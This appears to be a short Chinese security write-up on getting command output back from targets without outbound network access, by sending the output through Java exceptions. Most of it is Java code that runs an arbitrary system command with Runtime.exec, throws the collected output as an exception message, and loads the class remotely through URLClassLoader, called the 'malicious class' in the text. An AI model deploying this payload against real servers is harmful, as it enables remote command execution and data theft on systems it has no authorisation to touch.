看到师傅讲的很多不出网的利用方法是基本是基于报错来进行回显的

    image.png

    1. 构造命令执行模板代码
    2. 输出方式变成异常输出
    3. 之后通过URLClassloader的方式进行加载该恶意类
    1. import java.io.BufferedReader;
    2. import java.io.InputStream;
    3. import java.io.InputStreamReader;
    4. import java.lang.reflect.Constructor;
    5. import java.lang.reflect.InvocationTargetException;
    6. import java.net.MalformedURLException;
    7. import java.net.URL;
    8. import java.net.URLClassLoader;
    9. import java.nio.charset.Charset;
    11. public class Main  {
    12.     public Main(String name) throws Exception {
    13.         Process process = Runtime.getRuntime().exec(name);
    14.         InputStream stream = process.getInputStream();
    15.         InputStreamReader inputStreamReader = new InputStreamReader(stream,Charset.forName("gbk"));
    16.         BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
    17.         StringBuffer buf = new StringBuffer();
    18.         String line = null;
    19.         while( (line = bufferedReader.readLine())!=null){
    20.             buf.append(line+"\n");
    21.         }
    23.         throw new Exception(buf.toString());
    24.     }
    26.     public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException {
    27.         URLClassLoader classLoader = new URLClassLoader(new URL[]{new URL("http://127.0.0.1/")});
    28.         Class cls = classLoader.loadClass("Main");
    29.         Constructor obj = cls.getDeclaredConstructor(String.class);
    30.         obj.newInstance("ipconfig");
    31.     }
    32. }

    image.png